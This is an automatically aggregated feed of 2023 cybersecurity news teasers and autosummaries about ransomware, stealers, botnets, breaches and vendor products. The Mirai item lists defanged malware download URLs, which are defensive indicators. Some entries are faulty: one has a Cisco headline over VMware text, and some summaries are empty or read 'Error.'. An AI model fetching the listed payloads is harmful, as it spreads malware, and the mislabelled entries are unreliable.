    Healthcare continues to be one of the most attractive targets for cyberattackers, and the number of breaches affecting the industry is increasing yearly. In this Help Net Security video, Steve Gwizdala, VP of Healthcare at ForgeRock, discusses how vigilance and new ways of enhancing cybersecurity measures will be crucial to healthcare organizations and businesses responsible for protecting consumers’ online information – across the entire supply chain. There needs to be more than the traditional password … More →

    The post How ransomware impacts the healthcare industry appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Swedish data protection authority rules against the use of Google Analytics

    industry
    2023-07-05 https://securityaffairs.com/148157/laws-and-regulations/swedish-data-protection-authority-google-analytics.html
    

    Swedish data protection watchdog warns companies against using Google Analytics due to the risk of surveillance operated by the US government. The Swedish data protection watchdog warned businesses against using Google Analytics due to the risk of surveillance carried out by the US government. The Swedish Authority for Privacy Protection (IMY) conducted audits against CDON, […]

    The post Swedish data protection authority rules against the use of Google Analytics appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, surveillance) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    RedEnergy Stealer-as-a-Ransomware Threat Targeting Energy and Telecom Sectors

    exploits industry
    2023-07-05 https://thehackernews.com/2023/07/redenergy-stealer-as-ransomware-threat.html
    A sophisticated stealer-as-a-ransomware threat dubbed RedEnergy has been spotted in the wild targeting energy utilities, oil, gas, telecom, and machinery sectors in Brazil and the Philippines through their LinkedIn pages. The malware "possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for "

    Autosummary: Following a successful breach, the malicious binary is used as a conduit to set up persistence, perform the actual browser update, and also drop a stealer capable of covertly harvesting sensitive information and encrypting the stolen files, leaving the victims at risk of potential data loss, exposure, or even the sale of their valuable data. "

    ---

    RedEnergy Stealer-as-a-Ransomware employed in attacks in the wild

    exploits industry
    2023-07-05 https://securityaffairs.com/148193/malware/redenergy-stealer-as-a-ransomware.html
    

    RedEnergy is a sophisticated stealer-as-a-ransomware that was employed in attacks targeting energy utilities, oil, gas, telecom, and machinery sectors. Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks against energy utilities, oil, gas, telecom, and machinery sectors. The malware allows operators to steal information from various browsers, it also supports ransomware capabilities. […]

    The post RedEnergy Stealer-as-a-Ransomware employed in attacks in the wild appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, RedStealer) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks against energy utilities, oil, gas, telecom, and machinery sectors. "

    ---

    Google Analytics data transfer to U.S. brings $1 million fine to Swedish firms

    industry
    2023-07-04 https://www.bleepingcomputer.com/news/security/google-analytics-data-transfer-to-us-brings-1-million-fine-to-swedish-firms/
    The Swedish Authority for Privacy Protection (Integritetsskyddsmyndigheten - IMY) has fined two companies with 12.3 million SEK (€1 million/$1.1 million) for using Google Analytics and warned two others about the same practice. [...] "

    Autosummary: "

    ---

    Swedish Data Protection Authority Warns Companies Against Google Analytics Use

    industry
    2023-07-04 https://thehackernews.com/2023/07/swedish-data-protection-authority-warns.html
    The Swedish data protection watchdog has warned companies against using Google Analytics due to risks posed by U.S. government surveillance, following similar moves by Austria, France, and Italy last year. The development comes in the aftermath of an audit initiated by the Swedish Authority for Privacy Protection (IMY) against four companies CDON, Coop, Dagens Industri, and Tele2. "In its audits "

    Autosummary: "

    ---

    LockBit gang demands a $70 million ransom to the semiconductor manufacturing giant TSMC

    ransomware industry
    2023-07-01 https://securityaffairs.com/148022/cyber-crime/tsmc-lockbit-ransomware.html
    

    The LockBit ransomware gang claims to have hacked Taiwan Semiconductor Manufacturing Company (TSMC). The LockBit ransomware group this week claimed to have hacked the Taiwan Semiconductor Manufacturing Company (TSMC) and $70 million ransom. TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc. As reported by BleepingComputer, on Wednesday, […]

    The post LockBit gang demands a $70 million ransom to the semiconductor manufacturing giant TSMC appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    Over 1500 gas stations disrupted in Canada, after energy giant hacked

    industry
    2023-06-29 https://www.bitdefender.com/blog/hotforsecurity/over-1500-gas-stations-disrupted-in-canada-after-energy-giant-hacked/
    Suncor, one of the largest energy companies in North America, has suffered a cyber attack that left Canadian motorists unable to make gas station purchases with payment cards, and even disabled car washes. Read more in my article on the Hot for Security blog. "

    Autosummary: Error. "

    ---

    Bitdefender acquires Horangi Cyber Security to expand its unified risk and security analytics platform

    industry
    2023-06-28 https://www.helpnetsecurity.com/2023/06/28/bitdefender-horangi-cyber-security/
    

    Bitdefender has agreed to acquire Horangi Cyber Security to address the growing demand for advanced, streamlined management of cybersecurity, compliance, and governance of multi-cloud environments. As organizations continue to accelerate cloud adoption, they struggle to manage the thousands of configuration settings and permissions, identities, and entitlements presented by multiple cloud providers. According to Gartner, “Misconfigured cloud resources continue to be a primary reason for cloud-related data breaches.” A single point of insight and control across … More →

    The post Bitdefender acquires Horangi Cyber Security to expand its unified risk and security analytics platform appeared first on Help Net Security.

    "

    Autosummary: In a 2023 report, Gartner noted that “CSPM is commonly purchased as part of a cloud-native application protection platform (CNAPP) that includes broader cloud security capabilities such as cloud workload protection platform (CWPP), cloud infrastructure entitlement management (CIEM), Kubernetes security posture management (KSPM), cloud detection and response (CDR).” "

    ---

    AI cuts treatment time for cancer radiotherapy

    financial industry
    2023-06-27 https://www.bbc.co.uk/news/health-65988768?at_medium=RSS&at_campaign=KARANGA
    The technology will be offered at cost price to all NHS trusts in England, following successful pilot studies. "

    Autosummary: "

    ---

    Schneider Electric and Siemens Energy are two more victims of a MOVEit attack

    industry
    2023-06-27 https://securityaffairs.com/147865/data-breach/schneider-electric-siemens-energy-moveit.html
    

    Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including Schneider Electric and Siemens Energy. The Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial giants Schneider Electric and Siemens Energy. Both Schneider Electric and Siemens Energy provide […]

    The post Schneider Electric and Siemens Energy are two more victims of a MOVEit attack appeared first on Security Affairs.

    "

    Autosummary: Below is the list of victims added to the group’s leak site: werum.com Schneider Electric (http://se.com) Siemens Energy (http://siemens-energy.com) UCLA (http://ucla.edu) Abbie (http://abbvie.com) For the uninitiated, Schneider Electric and Siemens Energy are two more notable victims as they are very large Industrial Control System (#ICS) vendors. "

    ---

    Siemens Energy confirms data breach after MOVEit data-theft attack

    financial industry
    2023-06-27 https://www.bleepingcomputer.com/news/security/siemens-energy-confirms-data-breach-after-moveit-data-theft-attack/
    Siemens Energy has confirmed that data was stolen during the recent Clop ransomware data-theft attacks using a zero-day vulnerability in the MOVEit Transfer platform. [...] "

    Autosummary: It designs, develops, and manufactures a wide range of industrial products, including industrial control systems (ICS), state-of-the-art power, heat generation units, renewable energy systems, on and off-site energy delivery systems, and flexible power transmission solutions. "

    ---

    Uncovering attacker tactics through cloud honeypots

    industry
    2023-06-26 https://www.helpnetsecurity.com/2023/06/26/cloud-environments-honeypots/
    

    Attackers typically find exposed “secrets” – pieces of sensitive information that allow access to an enterprise cloud environment — in as little as two minutes and, in many cases, begin exploiting them almost instantly, highlighting the urgent need for comprehensive cloud security, according to Orca Security. Orca’s research was conducted between January and May 2023, beginning with the creation of “honeypots” on nine different cloud environments that simulated misconfigured resources in the cloud to entice … More →

    The post Uncovering attacker tactics through cloud honeypots appeared first on Help Net Security.

    "

    Autosummary: No region is safe Although 50% of all observed exposed AWS key usage took place in the United States, usage occurred in almost every other region as well, including Canada, APAC, Europe, and South America. "

    ---

    Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks

    industry
    2023-06-26 https://thehackernews.com/2023/06/chinese-hackers-using-never-before-seen.html
    The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest. The findings come from CrowdStrike, which is tracking the adversary under the name Vanguard Panda. "The adversary consistently employed ManageEngine "

    Autosummary: "The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said. "

    ---

    Suncor Energy cyberattack impacts Petro-Canada gas stations

    industry ciber
    2023-06-26 https://www.bleepingcomputer.com/news/security/suncor-energy-cyberattack-impacts-petro-canada-gas-stations/
    Petro-Canada gas stations across Canada are impacted by technical problems preventing customers from paying with credit card or rewards points as its parent company, Suncor Energy, discloses they suffered a cyberattack. [...] "

    Autosummary: "At this time, we are not aware of any evidence that customer, supplier, or employee data has been compromised or misused as a result of this situation," reads the Suncord press release. "

    ---

    Energy company Suncor suffered a cyber attack and its company Petro-Canada gas reported problems at its gas stations in Canada

    industry
    2023-06-26 https://securityaffairs.com/147834/hacking/petro-canada-suncor-problems.html
    

    The cyber attack suffered by Suncor Energy impacted payment operations at Petro-Canada gas stations in Canada. Suncor Energy is Canada’s leading integrated energy company that provides oil sands development, production and upgrading, offshore oil and gas, and petroleum refining in Canada and the U.S.. It owns the Petro-Canada retail and wholesale distribution networks. A cyber […]

    The post Energy company Suncor suffered a cyber attack and its company Petro-Canada gas reported problems at its gas stations in Canada appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Petro-Canada) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    OpenSSH trojan campaign targets Linux systems and IoT devices

    exploits industry
    2023-06-26 https://www.malwarebytes.com/blog/news/2023/06/openssh-trojan-campaign-targets-linux-systems-and-iot-devices
    

    Categories: News Tags: IoT Tags: Linux Tags: OpenSSH Tags: trojan Tags: botnet Tags: IRC Tags: attack Tags: compromise Poorly configured Linux and Internet of Things (IoT) devices are at risk of compromise from a cryptojacking campaign. (Read more...)

    The post OpenSSH trojan campaign targets Linux systems and IoT devices appeared first on Malwarebytes Labs.

    "

    Autosummary: The data that is taken includes: Operating system version Network configuration The contents of /etc/passwd and /etc/shadow Open source rootkits are installed in systems which support them, used to further hide malicious files and processes taking place under the hood.The operating system giant has some specific advice for those who may be worried about this attack impacting their business: Harden internet-facing devices against attacks Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access. "

    ---

    New Cryptocurrency Mining Campaign Targets Linux Systems and IoT Devices

    industry
    2023-06-23 https://thehackernews.com/2023/06/new-cryptocurrency-mining-campaign.html
    Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency. "The threat actors behind the attack use a backdoor that deploys a wide array of tools and components such as rootkits and an IRC bot to steal device resources for mining operations," Microsoft threat intelligence researcher Rotem Sde-Or said. "

    Autosummary: Furthermore, it runs a modified version of ZiggyStarTux, an IRC-based distributed denial-of-service (DDoS) client that"s capable of executing bash commands issued from the command-and-control (C2) server. "

    ---

    New Mirai botnet targets tens of flaws in popular IoT devices

    industry
    2023-06-22 https://securityaffairs.com/147750/malware/mirai-botnet-iot-devices.html
    

    Since March 2023, Unit 42 researchers have observed a variant of the Mirai botnet spreading by targeting tens of flaws in D-Link, Zyxel, and Netgear devices. Since March 2023, researchers at Palo Alto Networks Unit 42 have observed a new variant of the Mirai botnet targeting multiple vulnerabilities in popular IoT devices. Below is the […]

    The post New Mirai botnet targets tens of flaws in popular IoT devices appeared first on Security Affairs.

    "

    Autosummary: Upon executing the script, it would download and execute the proper bot clients for the specific Linux architectures: hxxp://185.225.74[.]251/armv4l hxxp://185.225.74[.]251/armv5l hxxp://185.225.74[.]251/armv6l hxxp://185.225.74[.]251/armv7l hxxp://185.225.74[.]251/mips hxxp://185.225.74[.]251/mipsel hxxp://185.225.74[.]251/sh4 hxxp://185.225.74[.]251/x86_64 hxxp://185.225.74[.]251/i686 hxxp://185.225.74[.]251/i586 hxxp://185.225.74[.]251/arc hxxp://185.225.74[.]251/m68k hxxp://185.225.74[.]251/sparc Once executed the bot client, the shell script downloader will delete the client executable file to avoid detection. "

    ---

    Startup Security Tactics: Friction Surveys

    industry
    2023-06-21 https://thehackernews.com/2023/06/startup-security-tactics-friction.html
    When we do quarterly planning, my team categorizes our goals within four evergreen outcomes: Reduce the risk of information security incidents Increase trust in Vanta"s information security program Reduce the friction caused by information security controls Use security expertise to support the business In this article, I"m going to focus on number three: reducing friction. Declaring your "

    Autosummary: Excellent philosophy for the security team [...] its just awesome too many security teams view security as an exclusive tradeoff between team operating power and security" Hidden friction Sometimes, when introducing new security controls, you are making a well considered tradeoff between security and user experience.When we do quarterly planning, my team categorizes our goals within four evergreen outcomes: Reduce the risk of information security incidents Increase trust in Vanta"s information security program Reduce the friction caused by information security controls Use security expertise to support the business In this article, I"m going to focus on number three: reducing friction. "

    ---

    iOttie discloses data breach after site hacked to steal credit cards

    financial industry
    2023-06-21 https://www.bleepingcomputer.com/news/security/iottie-discloses-data-breach-after-site-hacked-to-steal-credit-cards/
    Car mount and mobile accessory maker iOttie warns that its site was compromised for almost two months to steal online shoppers" credit cards and personal information. [...] "

    Autosummary: " iOttie has not shared how many customers were impacted but said that names, personal information, and payment information could have been stolen, including financial account numbers, credit and debit card numbers, security codes, access codes, passwords, and PINs. "

    ---

    Cymulate Exposure Analytics provides users with an attacker’s view of their cyber resilience

    industry
    2023-06-20 https://www.helpnetsecurity.com/2023/06/20/cymulate-exposure-analytics/
    

    Cymulate released a new solution for organizations to run an informed continuous threat exposure management (CTEM) program. The CTEM program, which was coined by Gartner is designed to diagnose the severity of exposures, create an action plan for remediation and facilitate a common language for discussions between business and technical teams. Disparate data sources, point-in-time collection, and lack of business context create challenges for cybersecurity teams to ingest and contextualize exposure data and translate it … More →

    The post Cymulate Exposure Analytics provides users with an attacker’s view of their cyber resilience appeared first on Help Net Security.

    "

    Autosummary: Correlated analysis from Cymulate and multi-vendor data that assesses on-premises and cloud attack surfaces, risky assets, attack paths, vulnerabilities, and business impact : Correlated analysis from Cymulate and multi-vendor data that assesses on-premises and cloud attack surfaces, risky assets, attack paths, vulnerabilities, and business impact Prioritization : Vulnerability prioritization & remediation guidance based on multi-vendor aggregated data that is normalized, contextualized, and evaluated against breach feasibility : Vulnerability prioritization & remediation guidance based on multi-vendor aggregated data that is normalized, contextualized, and evaluated against breach feasibility Validation : Analyze exposure severity, security integrity, and effectiveness of remediation from security validation assessment data.Mobilization: Utilize Cymulate contextualized data to understand various response outcome options, and establish and track performance against baselines, benchmarks, and risk profiles “Cymulate has always taken an attacker’s view on cybersecurity defense, and through our experience in breach and attack simulation we have carefully studied the ways attackers creatively exploit vulnerabilities and other exposures driven by human error, misconfiguration, or control weaknesses,” said Avihai Ben-Yossef, CTO of Cymulate. "

    ---

    Honduras prison violence: At least 41 killed in women"s jail riot

    industry
    2023-06-20 https://www.bbc.co.uk/news/world-latin-america-65969092?at_medium=RSS&at_campaign=KARANGA
    The country"s president says she will take "drastic measures" after the loss of at least 41 lives. "

    Autosummary: "

    ---

    Introducing AI-guided Remediation for IaC Security / KICS

    industry
    2023-06-19 https://thehackernews.com/2023/06/introducing-ai-guided-remediation-for.html
    While the use of Infrastructure as Code (IaC) has gained significant popularity as organizations embrace cloud computing and DevOps practices, the speed and flexibility that IaC provides can also introduce the potential for misconfigurations and security vulnerabilities.  IaC allows organizations to define and manage their infrastructure using machine-readable configuration files, which are "

    Autosummary: For example, improperly configured firewall rules, open ports, or lack of network segmentation can lead to unauthorized access, network attacks, or data exfiltration. Common types of misconfigurations Common misconfigurations include weak access controls, improperly exposed ports, insecure network configurations, or mismanaged encryption settings.Secrets, such as API keys, database passwords, or encryption keys, are sensitive pieces of information that should never be exposed or shared inadvertently. "

    ---

    Hackers use fake OnlyFans pics to drop info-stealing malware

    exploits industry
    2023-06-19 https://www.bleepingcomputer.com/news/security/hackers-use-fake-onlyfans-pics-to-drop-info-stealing-malware/
    A malware campaign is using fake OnlyFans content and adult lures to install a remote access trojan known as "DcRAT," allowing threat actors to steal data and credentials or deploy ransomware on the infected device. [...] "

    Autosummary: OnlyFans is a content subscription service where paid subscribers can access private photos, videos, and posts from adult models, celebrities, and social media personalities. "

    ---

    From Cryptojacking to DDoS Attacks: Diicot Expands Tactics with Cayosin Botnet

    industry
    2023-06-17 https://thehackernews.com/2023/06/from-cryptojacking-to-ddos-attacks.html
    Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named Diicot, revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it"s also the name of the Romanian organized crime and anti-terrorism policing unit," Cado Security said in a technical report. "In addition, "

    Autosummary: History - A shell script that"s designed to run Update The SSH brute-forcer tool (aka aliases), for its part, parses the text file output of Chrome to break into each of the identified IP addresses, and if successful, establishes remote connection to the IP address. "

    ---

    Oil and gas giant Shell is another victim of Clop ransomware attacks

    exploits ransomware industry
    2023-06-16 https://securityaffairs.com/147545/cyber-crime/shell-clop-ransomware-attacks.html
    

    British multinational oil and gas company Shell has confirmed that it has suffered a ransomware attack conducted by the Clop group. Oil and Gas giant Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign conducted by the Clop gang exploiting a MOVEit zero-day vulnerability Threat actors are actively exploiting the zero-day vulnerability, tracked […]

    The post Oil and gas giant Shell is another victim of Clop ransomware attacks appeared first on Security Affairs.

    "

    Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    How cybercriminals target energy companies

    industry ciber
    2023-06-15 https://www.helpnetsecurity.com/2023/06/15/how-cybercriminals-target-energy-companies-video/
    

    In this Help Net Security video, Jim Simpson, Director of Threat Intelligence at Searchlight Cyber, discusses how cybercriminals employ specialized strategies when targeting energy companies. This is primarily due to the sensitive and valuable information these organizations hold and their critical role in infrastructure, making them particularly attractive for economic and geopolitical disruption. Energy companies are routinely discussed on dark web forums, with threat actors frequently auctioning initial access via remote software, VPNs, and stolen … More →

    The post How cybercriminals target energy companies appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities

    exploits industry
    2023-06-15 https://thehackernews.com/2023/06/vidar-malware-using-new-tactics-to.html
    The threat actors behind the Vidar malware have made changes to their backend infrastructure, indicating attempts to retool and conceal their online trail in response to public disclosures about their modus operandi. "Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia," cybersecurity company Team Cymru said in a new analysis shared "

    Autosummary: Join the Session "By using VPN infrastructure, which in at least part was also utilized by numerous other benign users, it is apparent that the Vidar threat actors may be taking steps to anonymize their management activities by hiding in general Internet noise," Team Cymru noted. "

    ---

    Cynerio partners with Microsoft to ensure the security of medical and IoT devices

    industry
    2023-06-13 https://www.helpnetsecurity.com/2023/06/13/cynerio-microsoft/
    

    Cynerio collaborates with Microsoft to integrate with their cloud-native SIEM and SOAR offering Microsoft Sentinel. This collaboration aims to provide the healthcare industry with a comprehensive solution to address the growing security challenges posed by medical and IoT devices. As Leon Lerman, CEO of Cynerio, explains, “Medical and IoT devices are a black hole in the network that traditional IT security and inventory systems simply do not cover. As a result, customers are often left … More →

    The post Cynerio partners with Microsoft to ensure the security of medical and IoT devices appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    New PowerDrop Malware Targeting U.S. Aerospace Industry

    exploits industry
    2023-06-07 https://thehackernews.com/2023/06/new-powerdrop-malware-targeting-us.html
    An unknown threat actor has been observed targeting the U.S. aerospace industry with a new PowerShell-based malware called PowerDrop. "PowerDrop uses advanced techniques to evade detection such as deception, encoding, and encryption," according to Adlumin, which found the malware implanted in an unnamed domestic aerospace defense contractor in May 2023. "The name is derived from the tool, "

    Autosummary: "

    ---

    New PowerDrop malware targets U.S. aerospace defense industry

    exploits industry
    2023-06-07 https://securityaffairs.com/147168/apt/powerdrop-targets-aerospace.html
    

    A previously unknown threat actor has been observed targeting the U.S. aerospace defense sector with a new PowerShell malware dubbed PowerDrop. Researchers from the Adlumin Threat Research discovered a new malicious PowerShell script, dubbed PowerDrop, that was employed in attacks aimed at organizations in the U.S. aerospace sector. The PowerShell-based malware uses advanced techniques to […]

    The post New PowerDrop malware targets U.S. aerospace defense industry appeared first on Security Affairs.

    "

    Autosummary: “It highlights the importance of having dedicated 24/7 cybersecurity teams within any operational landscape,” Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, PowerDrop) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    Cisco fixes critical vulnerability in vRealize network analytics tool

    exploits industry
    2023-06-07 https://www.bleepingcomputer.com/news/security/cisco-fixes-critical-vulnerability-in-vrealize-network-analytics-tool/
    VMware issued multiple security patches today to address critical and high-severity vulnerabilities in VMware Aria Operations for Networks, allowing attackers to gain remote execution or access sensitive information. [...] "

    Autosummary: "

    ---

    0mega ransomware gang changes tactics

    exploits ransomware industry
    2023-06-07 https://www.helpnetsecurity.com/2023/06/07/0mega-ransomware-gang-changes-tactics/
    

    A number of ransomware gangs have stopped using malware to encrypt targets’ files and have switched to a data theft/extortion approach to get paid; 0mega – a low-profile and seemingly not very active threat actor – seems to be among them. About the 0mega ransomware operation 0mega (spelled with a zero) is a relative newcomer to the ransomware/extortion business. Evidence of its activities were first spotted roughly a year ago, when one victim – a … More →

    The post 0mega ransomware gang changes tactics appeared first on Help Net Security.

    "

    Autosummary: The attackers first compromised one of the company’s Microsoft Global admin service accounts that did not have multi-factor authentication enabled, then used it to create a new Microsoft AD user called 0mega and added various permissions to it (Global Administrator, SharePoint Administrator, Exchange Administrator, Teams Administrator). "

    ---

    VMware fixes critical vulnerability in vRealize network analytics tool

    exploits industry
    2023-06-07 https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-vulnerability-in-vrealize-network-analytics-tool/
    VMware issued multiple security patches today to address critical and high-severity vulnerabilities in VMware Aria Operations for Networks, allowing attackers to gain remote execution or access sensitive information. [...] "

    Autosummary: "

    ---

    VMware fixes critical vulnerabilities in vRealize network analytics tool

    industry
    2023-06-07 https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-vulnerabilities-in-vrealize-network-analytics-tool/
    VMware issued multiple security patches today to address critical and high-severity vulnerabilities in VMware Aria Operations for Networks, allowing attackers to gain remote execution or access sensitive information. [...] "

    Autosummary: "

    ---

    Academics, media, and think tanks warned of North Korean hacking campaign

    industry
    2023-06-06 https://www.bitdefender.com/blog/hotforsecurity/academics-media-and-think-tanks-warned-of-north-korean-hacking-campaign/
    North Korean state-sponsored hackers are targeting think tanks, research centres, media organisations, and academics in the United States and South Korea to gather intelligence. Read more in my article on the Hot for Security blog. "

    Autosummary: This initial contact may present itself as an attempt to solicit response to an inquiry related to foreign policy, conduct a survey, request an interview, ask the recipient for a resume or to review a document, or offer payment for authoring a research paper. "

    ---

    New "PowerDrop" PowerShell malware targets U.S. aerospace industry

    exploits industry
    2023-06-06 https://www.bleepingcomputer.com/news/security/new-powerdrop-powershell-malware-targets-us-aerospace-industry/
    A new PowerShell malware script named "PowerDrop" has been discovered to be used in attacks targeting the U.S. aerospace defense industry. [...] "

    Autosummary: Executing the decrypted command (Adlumin) Next, PowerDrop sends the results of the command execution back to the C2 server, and if they are too large, it splits them into 128-byte chunks transmitted in a stream of multiple messages. "

    ---

    Brics ministers call for rebalancing of global order away from West

    industry
    2023-06-02 https://www.bbc.co.uk/news/world-africa-65784030?at_medium=RSS&at_campaign=KARANGA
    The talks attended by Russia in South Africa are clouded by allegations of war crimes in Ukraine. "

    Autosummary: "

    ---

    North Korea"s Kimsuky Group Mimics Key Figures in Targeted Cyber Attacks

    industry
    2023-06-02 https://thehackernews.com/2023/06/north-koreas-kimsuky-group-mimics-key.html
    U.S. and South Korean intelligence agencies have issued a new alert warning of North Korean cyber actors" use of social engineering tactics to strike think tanks, academia, and news media sectors. The "sustained information gathering efforts" have been attributed to a state-sponsored cluster dubbed Kimsuky, which is also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet ( "

    Autosummary: The "sustained information gathering efforts" have been attributed to a state-sponsored cluster dubbed Kimsuky, which is also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima. "

    ---

    iPhone in India: Foxconn to manufacture smartphones in Karnataka by April 2024

    industry
    2023-06-02 https://www.bbc.co.uk/news/world-asia-india-65784719?at_medium=RSS&at_campaign=KARANGA
    Apple"s decision to manufacture iPhones in India aims at diversifying away from China "

    Autosummary: "

    ---

    Digi International updates SkyCloud features for industrial monitoring and control solutions

    industry
    2023-06-02 https://www.helpnetsecurity.com/2023/06/02/digi-skycloud/
    

    Digi International has released the latest version of Digi SkyCloud, a solution for monitoring, analyzing and controlling field data. The 23.5 update of SkyCloud introduces a range of new features, giving users effortless systems integrations with remote monitoring and control solutions — delivering flexibility and optimal efficiency, making it ideal for industrial, agricultural and environmental industries. Company administrators can now better manage their deployment and user base. At the forefront of this release are the … More →

    The post Digi International updates SkyCloud features for industrial monitoring and control solutions appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Galvanick raises $10 million for its industrial cybersecurity platform

    industry ciber
    2023-06-02 https://www.helpnetsecurity.com/2023/06/02/galvanick-seed-round/
    

    Galvanick announced its $10 million seed round. Major investors included MaC Venture Capital, Founders Fund, Village Global, Countdown Capital, Hanover Technology Investment Management, Shrug Capital, 8090 Industries, and over 25 angel investors specializing in cybersecurity, manufacturing, finance, and defense. Galvanick plans to use the capital to make additional core hires, and expand use of its initial product – a Extended Detection & Response (XDR) platform – to additional advanced manufacturing and critical infrastructure facilities. Galvanick … More →

    The post Galvanick raises $10 million for its industrial cybersecurity platform appeared first on Help Net Security.

    "

    Autosummary: Major investors included MaC Venture Capital, Founders Fund, Village Global, Countdown Capital, Hanover Technology Investment Management, Shrug Capital, 8090 Industries, and over 25 angel investors specializing in cybersecurity, manufacturing, finance, and defense. "

    ---

    Phishing campaigns thrive as evasive tactics outsmart conventional detection

    financial industry
    2023-06-01 https://www.helpnetsecurity.com/2023/06/01/advanced-detection-evasion-techniques/
    

    A 25% increase in the use of phishing kits has been recorded in 2022, according to Group-IB. The key phishing trends observed are the increasing use of access control and advanced detection evasion techniques. The rise in evasive tactics, such as antibot techniques and randomization, poses a significant challenge for conventional detection systems and extends the lifespan of phishing campaigns. 3,677 unique phishing kits in 2022 have been identified, 25% more than in 2021. A … More →

    The post Phishing campaigns thrive as evasive tactics outsmart conventional detection appeared first on Help Net Security.

    "

    Autosummary: For example, in 2022, approximately 1,500 phishing kits contained the functionality for transferring stolen data either via Telegram, email or by writing the data to a file locally on the server, which indicates their growing sophistication. Notably, in 2022, Group-IB researchers observed a 40% increase in the use of anti-bot technologies designed to prevent automated cybersecurity scanners from identifying phishing content. "

    ---

    Improved BlackCat Ransomware Strikes with Lightning Speed and Stealthy Tactics

    exploits ransomware industry
    2023-06-01 https://thehackernews.com/2023/06/improved-blackcat-ransomware-strikes.html
    The threat actors behind BlackCat ransomware have come up with an improved variant that prioritizes speed and stealth in an attempt to bypass security guardrails and achieve their goals. The new version, dubbed Sphynx and announced in February 2023, packs a "number of updated capabilities that strengthen the group"s efforts to evade detection," IBM Security X-Force said in a new analysis. The " "

    Autosummary: Sphynx also incorporates a loader to decrypt the ransomware payload that, upon execution, performs network discovery activities to hunt for additional systems, deletes volume shadow copies, encrypts files, and finally drops the ransom note. "

    ---

    Secureworks strengthens industrial cybersecurity with two new offerings

    industry ciber
    2023-06-01 https://www.helpnetsecurity.com/2023/06/01/secureworks-taegis-managedxdr/
    

    Secureworks has launched two new offerings to unify the way industrial organizations prevent, detect, and respond to threats across the OT and IT landscapes. The convergence of OT and IT in the industrial sector brings technological and economic benefits, but also increases risk. The more OT systems are digitally connected, the larger the overall attack surface becomes, making OT an increasingly attractive target for threat actors. This, combined with a global cybersecurity talent shortage numbering … More →

    The post Secureworks strengthens industrial cybersecurity with two new offerings appeared first on Help Net Security.

    "

    Autosummary: The solution includes: 24×7 threat monitoring with unlimited access to security experts in 90 seconds or less, collaborative design of OT and IT response processes, customizable rules and playbooks, quarterly expert security reviews, monthly threat hunting, onboarding support, and access to proactive services (including incident response planning and adversarial testing).Their risks include unplanned shutdowns, financial losses, and harm to human populations that rely on critical services,” said Kyle Falkenhagen, CPO, Secureworks. "

    ---

    Nozomi and Cynalytica team to deliver security solutions to OT & IoT environments

    industry
    2023-06-01 https://www.helpnetsecurity.com/2023/06/01/nozomi-and-cynalytica-team-to-deliver-security-solutions-to-ot-iot-environments/
    

    Nozomi Networks and Cynalytica have unveiled they have partnered to provide a visibility, monitoring and threat detection solution that encompasses both TCP/IP-based and non-IP based serial bus and analog connections found in OT and IoT environments. The joint solution simplifies the challenge of addressing security across modernized and legacy systems, and converges security monitoring across an unlimited number of facilities and systems to a central location. “The current cybersecurity challenges and gaps faced by ICS/SCADA … More →

    The post Nozomi and Cynalytica team to deliver security solutions to OT & IoT environments appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Smashing Security podcast #324: .ZIP domains, AI lies, and did social media inflame a riot?

    industry
    2023-05-31 https://grahamcluley.com/smashing-security-podcast-324/
